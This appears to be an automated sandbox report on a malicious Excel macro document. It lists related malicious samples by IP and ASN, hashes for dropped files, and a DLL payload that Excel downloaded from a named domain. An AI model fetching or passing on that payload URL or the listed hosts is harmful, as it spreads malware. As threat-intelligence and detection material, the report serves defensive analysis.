cdn.digicertcdn.com | https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D | malicious | 104.18.10.39

                                                                                                                                      ASN

Match | Associated Sample Name / URL | Detection | Context
GD-EMEA-DC-SXB1DE | INV8073565781-20210111319595.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | HkNkyKl3uT.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | ceepq536n.zip.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | sample20210111-01.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | INV3867196801-20210111675616.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | hiytvys.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | l7rgi3xyd.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | ymuyks.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | INV9698791470-20210111920647.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | hy9x6wzip.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | INV7693947099-20210111388211.xlsm | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | jufk0vrar.dll | malicious | 80.86.91.27
GD-EMEA-DC-SXB1DE | s3CRQNulKZ.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | DFR2154747.vbe | malicious | 85.25.93.233
GD-EMEA-DC-SXB1DE | r8a97.exe | malicious | 62.75.168.106
GD-EMEA-DC-SXB1DE | NKsplucdAu.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | lZVNh1BPxm.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | qG5E4q8Cv5.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1DE | 990109.exe | malicious | 87.230.93.218
OVHFR | INV8073565781-20210111319595.xlsm | malicious | 46.105.131.65
OVHFR | HkNkyKl3uT.dll | malicious | 46.105.131.65
OVHFR | Doc_74657456348374.xlsx | malicious | 149.202.23.211
OVHFR | ceepq536n.zip.dll | malicious | 46.105.131.65
OVHFR | sample20210111-01.xlsm | malicious | 46.105.131.65
OVHFR | INV3867196801-20210111675616.xlsm | malicious | 46.105.131.65
OVHFR | sfk_setup.exe | malicious | 54.39.133.136
OVHFR | hiytvys.dll | malicious | 46.105.131.65
OVHFR | l7rgi3xyd.dll | malicious | 46.105.131.65
OVHFR | ymuyks.dll | malicious | 46.105.131.65
OVHFR | Client.vbs | malicious | 92.222.182.237
OVHFR | INV9698791470-20210111920647.xlsm | malicious | 46.105.131.65
OVHFR | hy9x6wzip.dll | malicious | 46.105.131.65
OVHFR | INV7693947099-20210111388211.xlsm | malicious | 46.105.131.65
OVHFR | jufk0vrar.dll | malicious | 46.105.131.65
OVHFR | Pioneercon Project Contract.exe | malicious | 51.195.53.221
OVHFR | Outstanding Payments.exe | malicious | 51.195.53.221
OVHFR | Quw3X5oAwe.exe | malicious | 51.83.208.157
OVHFR | H56P7iDwnJ.doc | malicious |
                                                                                                                                      • 142.44.230.78
                                                                                                                                      11998704458248.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.37.160.157
                                                                                                                                      SENTIANLINV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.233
                                                                                                                                      anthon.exeGet hashmaliciousBrowse
                                                                                                                                      • 145.131.21.142
                                                                                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      148wWoi8vI.exeGet hashmaliciousBrowse
                                                                                                                                      • 91.216.141.46
                                                                                                                                      plusnew.exeGet hashmaliciousBrowse
                                                                                                                                      • 145.131.29.142
                                                                                                                                      List-20200731-79226.docGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.16
                                                                                                                                      LIST-20200731-88494.docGet hashmaliciousBrowse
                                                                                                                                      • 5.100.228.16

JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
Process: C:\Windows\System32\DWWIN.EXE
File Type: data
Category: dropped
Size (bytes): 914
Entropy (8bit): 7.367371959019618
Encrypted: false
SSDEEP: 24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
MD5: E4A68AC854AC5242460AFD72481B2A44
SHA1: DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
SHA-256: CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
SHA-512: 5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
Malicious: false
Reputation: moderate, very likely benign file
Preview (binary dump, readable strings only): DER certificate data containing "DigiCert Inc", "www.digicert.com" and "DigiCert Global Root G2"

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\regsvr32.exe
File Type: Microsoft Cabinet archive data, 58936 bytes, 1 file
Category: dropped
Size (bytes): 58936
Entropy (8bit): 7.994797855729196
Encrypted: true
SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5: E4F1E21910443409E81E5B55DC8DE774
SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious: false
Reputation: high, very likely benign file
Preview (binary dump, readable strings only): "MSCF" cabinet header, embedded file name "authroot.stl"

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Process: C:\Windows\System32\DWWIN.EXE
File Type: data
Category: dropped
Size (bytes): 252
Entropy (8bit): 3.089295105400412
Encrypted: false
SSDEEP: 6:kK/HlpLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:XLLutWOxSW0zeYrsMlU/
MD5: 72E00E19442BB7E93F3908C071B130CB
SHA1: BD328D24B74632C28AE692BF3EE16E620F12E0F1
SHA-256: 2010F1E5DFD83D2B6E4ED939379B7800E0C1AAACDE46A3FE52244972E24A5737
SHA-512: B162C3372E391A0EF7EF67E392FCB0E1BE92420917161C79A766785DCE3987CA80334B288EC1A4DA48656F8727D7C7993B8C4CB0D2D501044F55AE8BA2419C4A
Malicious: false
Reputation: low
Preview (binary dump, UTF-16 strings decoded): http://cacerts.digicert.com/DigiCertGlobalRootG2.crt "5a286417-392"

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\regsvr32.exe
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.117051994467751
Encrypted: false
SSDEEP: 6:kKSswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:8kPlE99SNxAhUegeT2
MD5: DE36DFB311F1F1E1500F1441082AEF73
SHA1: C18093F2820E8F102030DCED7F49169EA2558957
SHA-256: D25B61CAA10245DB2AC75ABAC9515B8347DA50D43B20B7E7071E10FED426437A
SHA-512: E73588F396B34CAC87C698EBB2129F7BFEF0ABDAB2750E15CDB54354CA869F035979F3A28573CB7E1779F162E03676D9751BE27C9886A6A6AFB9C0AF21E519DB
Malicious: false
Reputation: low
Preview (binary dump, UTF-16 strings decoded): http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "069559e2a0d61:0"

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):318976
                                                                                                                                      Entropy (8bit):7.120180422335748
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:/HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:vdO02Srnh0qEJC+Y218jdU
                                                                                                                                      MD5:8E5596083FD4C3134204E905F7F66325
                                                                                                                                      SHA1:6902210F93D3A940571CC860C4563CD4BE14EDB9
                                                                                                                                      SHA-256:8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
                                                                                                                                      SHA-512:E7084948B9F9BCB28F7C85A2812825D8012327BCFB5310F5759AEBD585504624682187F9A6AF86206295BFB4F1A9A178DC9322218B2E0A72E2CB3B8FCFB370E5
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Reputation:low
                                                                                                                                      IE Cache URL:http://truxiellogroup.com/d0l359.rar
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1182D45F.emf
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1408
                                                                                                                                      Entropy (8bit):2.270567557934206
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
                                                                                                                                      MD5:40550DC2F9D56285FA529159B8F2C6A5
                                                                                                                                      SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                                                                                                                                      SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                                                                                                                                      SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C189A2D4.png
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2653
                                                                                                                                      Entropy (8bit):7.818766151665501
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                                                                                                                                      MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                                                                                                                                      SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                                                                                                                                      SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                                                                                                                                      SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_054eb55b\Report.wer
                                                                                                                                      Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15586
                                                                                                                                      Entropy (8bit):3.712887681614445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:JMakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1rXm:xBKzFCEuhTlyZVaP+VaJq
                                                                                                                                      MD5:E2F871D534BE85A5D1D87962878F3CC8
                                                                                                                                      SHA1:D7C5349015944691DB5F68ECA1794D9FB460B12F
                                                                                                                                      SHA-256:C93D863E7911D1CE05577528D7C3239AC8C23640C87B494335774C6923CE53D3
                                                                                                                                      SHA-512:0F8AB684D460169E3D1607678D721487AC97758C99D59EC56A6D02B5C8B13E8AE7151201E87A569DDE00E51F3BA0992AE253C47879DA0A5757F86EF530D4AC95
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Version=1
                                                                                                                                      EventType=APPCRASH
                                                                                                                                      EventTime=132549182451685421
                                                                                                                                      ReportType=2
                                                                                                                                      Consent=1
                                                                                                                                      UploadTime=132549182619541716
                                                                                                                                      ReportIdentifier=b4dab12b-54ba-11eb-adcf-ecf4bbb5915b
                                                                                                                                      IntegratorReportIdentifier=b4dab12a-54ba-11eb-adcf-ecf4bbb5915b
                                                                                                                                      Response.type=4
                                                                                                                                      Sig[0].Name=Application Name
                                                                                                                                      Sig[0].Value=EXCEL.EXE
                                                                                                                                      Sig[1].Name=Application Version
                                                                                                                                      Sig[1].Value=14.0.7015.1000
                                                                                                                                      Sig[2].Name=Application Timestamp
                                                                                                                                      Sig[2].Value=51cca7cd
                                                                                                                                      Sig[3].Name=Fault Module Name
                                                                                                                                      Sig[3].Value=URLMON.DLL
                                                                                                                                      Sig[4].Name=Faul
                                                                                                                                      C:\Users\user\AppData\Local\Temp\7EEE0000
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58629
                                                                                                                                      Entropy (8bit):7.8593552280696395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:hde8RzggbLmCf6646CIKjPeshJSt3LGssLNFqnf:hN1rmCM27US57+Gf
                                                                                                                                      MD5:A733BA7BF8D80EC5C888654C8142757F
                                                                                                                                      SHA1:E443C3DEF948214C13FDB42C403CD98C623597E6
                                                                                                                                      SHA-256:C32A32E0184B39E4D6859FA4EFF53E07482C97E7F6F701E7D6A4AC38FDE3650D
                                                                                                                                      SHA-512:45D679F714BC29FACADCEEA1254DEB4BAF3EED57B209D1089622B4ED8450028FF4B2007CE4D084685795B2742C7B97BC91C71303FF9AB788C29FDA362D9BD114
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Temp\996393.cvr
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1392
                                                                                                                                      Entropy (8bit):3.146905721655599
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gll/3upGvshFO/uSd+EbzlUlHYql/CkY/HxLBXmmP82P+ddmJaqyYgYDzbq:gll/eO0Ondz6lHYxhHJG0p1Pq
                                                                                                                                      MD5:B511B97280F8902D8F205C460BAC3431
                                                                                                                                      SHA1:EFD15EE2CB86C5A3030E9E7FB527CAD7C2ACD81D
                                                                                                                                      SHA-256:5B536AC721BC40755710179C13FF94BF83266717FA6436EEE0DFA91D117C68F0
                                                                                                                                      SHA-512:B3C1766FAC22F556EE7975888074555F2A2A56D81783015B92685BC852745787D852A5338BA8BCA414891FDE201FC765B239E1F7AB3CE3BE05510E03BE06CF20
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Temp\Cab6C4B.tmp
                                                                                                                                      Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):58936
                                                                                                                                      Entropy (8bit):7.994797855729196
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):241332
                                                                                                                                      Entropy (8bit):4.206792199643493
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:cGQLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cRNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                      MD5:FA3D2E7DC0BD05B5AEDFE08FAB1F6CA1
                                                                                                                                      SHA1:3576B4581BFC16AADF82EE8334A3A5C9FA53208C
                                                                                                                                      SHA-256:B14E55289527C8ABD24B9982C570142B0463EB7AE1E96D1BD05ACDD71112560E
                                                                                                                                      SHA-512:A1CF22CE16BE9567984AC4987539452991851E80BD49D9040A5FEA7E87E68015BC728F7C4031FC35A28D53D6F2506625A3581FF01B773568FC33615DBB89EEE3
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Temp\Tar6C4C.tmp
                                                                                                                                      Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):152533
                                                                                                                                      Entropy (8bit):6.31602258454967
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                                                      MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                                                      SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                                                      SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                                                      SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Temp\WER540A.tmp.WERInternalMetadata.xml
                                                                                                                                      Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3110
                                                                                                                                      Entropy (8bit):3.684747436008537
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3JX3:Wl7LBNuhhgG45nv5J
                                                                                                                                      MD5:544F11F1848CAA1BDF520C7BF1537FD7
                                                                                                                                      SHA1:644C10A1C87B99C77E7A9863547517AE90FDB128
                                                                                                                                      SHA-256:CF5212AF389E57239B30155E147E7B660C2E2856576B97D51575D4BF5B1F27AF
                                                                                                                                      SHA-512:1A34F36C8F8FA96C09CE01ECD2164ADF6B75CFC4B077409D4DC41CA68C6560A243C9DA29DBA2415C4491F7FFDB3A3784325F1E580E9DF018897A0BBCC251C52A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\aymakjne.dll
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):318976
                                                                                                                                      Entropy (8bit):7.120180422335748
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:/HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:vdO02Srnh0qEJC+Y218jdU
                                                                                                                                      MD5:8E5596083FD4C3134204E905F7F66325
                                                                                                                                      SHA1:6902210F93D3A940571CC860C4563CD4BE14EDB9
                                                                                                                                      SHA-256:8110E38AFD33797465AB43841B1C54ABFF7A25ACC30FA27C2623966750D34737
                                                                                                                                      SHA-512:E7084948B9F9BCB28F7C85A2812825D8012327BCFB5310F5759AEBD585504624682187F9A6AF86206295BFB4F1A9A178DC9322218B2E0A72E2CB3B8FCFB370E5
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.z...`.......&.......@...............................@..........................................................|....................0..P....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.F....p.......2..............@..@.data...`............4..............@....text4...R.......T...P.............. ..@.rsrc...|........0..................@..@.reloc..P....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar26F8.xar
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):53009
                                                                                                                                      Entropy (8bit):7.830887605520775
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:2LUQ86SWyYyqKS4+/28nv5LkJ49TQRNnr:lQBdYLSTdfKN
                                                                                                                                      MD5:0F1C74C7084B8DD3BA2524E47E787875
                                                                                                                                      SHA1:1D2DE4747C353CB75756F9A4A76633FA8EBEDD26
                                                                                                                                      SHA-256:FB9F25B1D23FFE5D9EC94866A1D3FCA0FF6FC473ACBE6579B256DBAE0B1AA7B7
                                                                                                                                      SHA-512:BEA53FD5FB1B9FD38468EF7F7C65CFAD24BD9CDC8BE104F11446A6C460C594AB04BD57C0765D29E60E6EE6B9278D882569F88BB60900D12060FE187FAA2C323D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 08:43:48 2021, atime=Tue Jan 12 08:43:48 2021, length=12288, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):867
                                                                                                                                      Entropy (8bit):4.47302362689527
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:85QWu1LgXg/XAlCPCHaXgzB8IB/jUNX+WnicvbLKG+bDtZ3YilMMEpxRljKATdJU:85YP/XTwz6IhGYevLSDv3q5rNru/
                                                                                                                                      MD5:34B42419EC07BB353437B55D51FCDAC0
                                                                                                                                      SHA1:06611D195641AEAD292D3FE00CF700897807799C
                                                                                                                                      SHA-256:D8D41B83FD02428C3044319FBF03C5CE71AEC0A17191F2592399AF14BF028AB1
                                                                                                                                      SHA-512:A228F3C6073C0C7D71C101C38D5A2C5C0E1DD64865607834C5BEA5CE1A5C925EB38EFD99E7526BD3EC48EC3588085F6E40C4E182F27A4FA00B2A2E0BE53F2285
                                                                                                                                      Malicious:false
